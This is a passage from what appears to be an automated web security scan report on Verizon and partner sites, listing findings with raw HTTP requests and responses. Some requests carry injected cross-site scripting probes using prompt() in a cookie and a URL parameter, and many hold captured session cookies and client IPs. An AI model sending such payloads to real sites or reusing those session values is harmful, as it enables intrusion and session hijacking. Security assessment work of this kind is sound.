Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; NSC_dpmmbcfyubjnt_mcw=ffffffff8f64125045525d5f4f58455e445a4a422971

xml=%3Cxml%3E%3Ccommand%3EPING-RECEIVED%3C/command%3E%3Cmessage%3E1%3C/message%3E%3CparamValue%3E%3C/paramValue%3E%3C/xml%3E&visitorName=You%20said

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:23:58 GMT
Content-type: text/xml
Cache-Control: no-store
Pragma: no-cache
Expires: 0
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 110

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<response>
<result>Success</result>
</response>

7.3. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/StaticMapService.GetMapImage

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /maps/api/js/StaticMapService.GetMapImage?1m2&1i945&2i1652&2e1&3u4&4m2&1u0&2u0&5m3&1e0&2b1&5sen-US&token=7479 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/jobs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Date: Mon, 05 Sep 2011 22:00:18 GMT
Expires: Tue, 06 Sep 2011 22:00:18 GMT
Server: staticmap
Content-Length: 98
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 1118

.PNG
.
...IHDR.............%.V.....PLTE.......T.7....bKGD...-....
IDAT..c`.......!.3....IEND.B`.

7.4. http://sales.liveperson.net/hc/2329305/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hc/2329305/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/2329305/?&site=2329305&cmd=mTagStartPage&lpCallId=661916965686-30565438610&protV=20&lpjson=1&page=http%3A//business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb%3F_nfpb%3Dtrue%26_pageLabel%3DSMBPortal_page_main_overviewcc2a1%2527-prompt%28%2522POTS%2522%29-%2527be3f42647c0&id=3544976267&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sbp-sales&activePlugin=none&cobrowse=true&PV%21unit=sbp-sales&PV%21language=english&PV%21pageLoadTime=30%20sec&PV%21visitorActive=1&SV%21SignedIn=false&VV%21SessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2%211058537351%211315262147499&title=Verizon%20Small%20Business%20Center&referrer=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cobrowse=true&cookie=SaasSessionID%3D6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2%211058537351%3B%20AkaUTrackingID%3DCCA5CE7F785A7866A11942A8BCDFE833%3B%20AkaSTrackingID%3DF03373E721508DB1B1034D461D039B58%3B%20WT_FPC%3Did%3D2c3c65f8f20234949171315269354494%3Alv%3D1315269408034%3Ass%3D1315269354494%3B%20CP%3Dnull*%3B%20tzone%3D300%3B%20POPLocation%3Dpopip%3D50.23.123.106%26popindicator%3D%26popcity%3D%26popstate%3D%26popzipcode%3D%26popcounty%3D%26popdma%3D%26popservice%3D%26connex%3D%26prizm%3D%26usertype%3D%26partner%3D%26fiostvown%3D%26fiosvoice%3D%26vasonly%3D%26npa%3D%26nxx%3D%26msp%3D%26pws%3D%26viss%3D%26vgodfamily%3D%26vgodunlim%3D%26vec%3D%26vsbb%3D%26pts%3D%26online_backup%3D%26audio_conf%3D%26smb_premmail%3D%26sec_email%3D%26webhosting%3D%26bbaw%3D%26smb_enh_msg%3D%26webex%3D%3B%20POPRefid%3Drefid%3D%26refresh%3Dy%26reftrytime%3D0%26refnum%3D HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overviewcc2a1%27-prompt(%22POTS%22)-%27be3f42647c0
Cookie: HumanClickKEY=6007106324566664594; LivePersonID=LP i=546022977410,d=1312768968; HumanClickACTIVE=1315262239661

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:37:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_2329305=STANDALONE; path=/hc/2329305
Set-Cookie: LivePersonID=-546022977410-1315262242:-1:-1:-1:-1; expires=Tue, 04-Sep-2012 22:37:26 GMT; path=/hc/2329305; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 05 Sep 2011 22:37:26 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 187

lpConnLib.Process({"ResultSet": {"lpCallId":"661916965686-30565438610","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

7.5. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://verizonwireless.tt.omtrdc.net
Path:   /m2/verizonwireless/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/verizonwireless/mbox/standard?mboxHost=www.verizonwireless.com&mboxSession=1315278871714-190238&mboxPage=1315278871714-190238&screenHeight=1200&screenWidth=1920&browserWidth=1069&browserHeight=853&browserTimeOffset=-300&colorDepth=16&mboxCount=1&loggedin=false&mbox=NSE_PNA_VWHP&mboxId=0&mboxTime=1315260872654&mboxURL=http%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Findex.html&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40 HTTP/1.1
Host: verizonwireless.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 1007
Date: Mon, 05 Sep 2011 22:14:32 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('NSE_PNA_VWHP',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-default-NSE
...[SNIP]...

7.6. https://www22.verizon.com/ifederation/SmMakeCookie.ccc

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /ifederation/SmMakeCookie.ccc

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /ifederation/SmMakeCookie.ccc?SMSESSION=QUERY&PERSIST=0&TARGET=$SM$https%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; 
RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com; vzAppID=; LOB_CATEGORY=; refURL=https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.0 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Content-Length: 0
Content-Type: text/html
Location: https://enterprisecenter.verizon.com/enterprisesolutions/global/gHome.do?SMSESSION=NO
nnCoection: close
Expires: Mon, 05 Sep 2011 22:25:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:36 GMT
Connection: keep-alive


8. Password field submitted using GET method

Summary

Severity:   Low
Confidence:   Certain
Host:   https://dashboard.opinionlab.com
Path:   /pv_controlboard.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /pv_controlboard.html HTTP/1.1
Host: dashboard.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:34:47 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/1.0.0 DAV/2 mod_python/3.3.1 Python/2.6
X-Server-Name: dash-apachevm02
Connection: close
Content-Type: text/html
Set-Cookie: NSC_Qvcmjd-Ebticpbse=ffffffff0912667945525d5f4f58455e445a4a423660;expires=Mon, 05-Sep-2011 22:49:47 GMT;path=/;secure;httponly
Content-Length: 16994

<html xmlns:date="http://exslt.org/dates-and-times">
<head>
<title>OpinionLab, Inc. | Dashboard V1.2</title>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type">
<meta content="" name="
...[SNIP]...
<body onload="document.loginform.subscriber_id.focus()"><form method="get" name="loginform" action="/login/dashboard.html">
<input type="hidden" name="sess_id" value="94efa68611582c29a8943120d206cf56">
...[SNIP]...
<td><input class="inputURL" name="password" type="password" style="width: 150px"></td>
...[SNIP]...

9. ASP.NET ViewState without MAC enabled
There are 11 instances of this issue:

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.


9.1. http://www22.verizon.com/ResidentialHelp/eRepairSigninPopup.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /ResidentialHelp/eRepairSigninPopup.aspx

Request

GET /ResidentialHelp/eRepairSigninPopup.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 5573
Expires: Mon, 05 Sep 2011 22:37:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:23 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD>
       <title>eRepairSigninPopup</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNTI4NTAxODExZGQ=" />
...[SNIP]...

9.2. http://www22.verizon.com/ResidentialHelp/iHAPopup/125612.htm

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /ResidentialHelp/iHAPopup/125612.htm

Request

GET /ResidentialHelp/iHAPopup/125612.htm HTTP/1.1
Host: www22.verizon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/residentialhelp/fiostv
Cookie: __switchTo5x=51; __unam=49dc76-1323a4a13fb-1bbb4ff9-1; ASP.NET_SessionId=ncxmtseom3hg3h4542cc0c55; GlobalSessionID=NEScwnwaL4QccG18LnT8IJ7HQ%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:13:38 PM; AkaUTrackingID=804E8C682B3FA4D861FA571CC854E9FD; AkaSTrackingID=22240856919E5F4D120128A4C01974E7; V347=3JqCYcsE1rlAhTfmCIUyRZ-iggeiohK6a-FKkJ_aMvvIaMkdz3Ks80g; CP=null*; refURL=http://www22.verizon.com/residentialhelp/fiostv; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ca45525d5f4f58455e445a4a423660; Product=A; ProductXML=A; canigetfios=Y; showpromo=N; BusinessUnit=wireless; XPID=BO-00000000521444319_%20%7C%20HSIPOE_2; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>prompt("StoredXSS")</script>af81f92fd39; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; CMS_TimeZoneOffset=300; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Mon, 05 Sep 2011 22:29:57 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 10485
Expires: Mon, 05 Sep 2011 22:29:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:29:57 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML xmlns:vz>
   <HEAD id="head"><title>

</title><meta name="GENERATOR" content="Microsoft Visual Studio 7.0" /><meta name="CODE
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
...[SNIP]...

9.3. http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /ResidentialHelp/templates/layers/setpreferences_generic.aspx

Request

GET /ResidentialHelp/templates/layers/setpreferences_generic.aspx?TabValue=TV HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm; RecentlyVisited=Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 8339
Expires: Mon, 05 Sep 2011 22:24:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title class="inf
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJOTA4NjkzMTc0D2QWAmYPZBYEZg8WAh4HVmlzaWJsZWgWAgIBDxBkZBYAZAICDxYCHwBoZGQ=" />
...[SNIP]...

9.4. http://www22.verizon.com/residentialhelp/Templates/layers/setpreferences.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/Templates/layers/setpreferences.aspx

Request

GET /residentialhelp/Templates/layers/setpreferences.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 11732
Expires: Mon, 05 Sep 2011 22:37:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:19 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<title>My Preferences</title>
<link rel="stylesheet" type="text/css" href="/r
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzkzMzg3OTk3ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUKcmRvU3VwcG9ydAUKcmRvU3VwcG9ydAULcmRvSW50ZXJuZXQFC3Jkb0ludGVybmV0BQVyZG9UVgUFcmRvVFYFCHJkb1Bob25lBQhyZG9QaG9uZQULcmRvV2lyZWxlc3MFC3Jkb1dpcmVsZXNz" />
...[SNIP]...

9.5. http://www22.verizon.com/residentialhelp/globalfooterhelp.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/globalfooterhelp.aspx

Request

GET /residentialhelp/globalfooterhelp.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 3653
Expires: Mon, 05 Sep 2011 22:37:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Footer
</t
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTY4MzY2NzM3MmRk" />
...[SNIP]...

9.6. http://www22.verizon.com/residentialhelp/globalheaderhelp.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/globalheaderhelp.aspx

Request

GET /residentialhelp/globalheaderhelp.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 373312
Expires: Mon, 05 Sep 2011 22:37:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:21 GMT
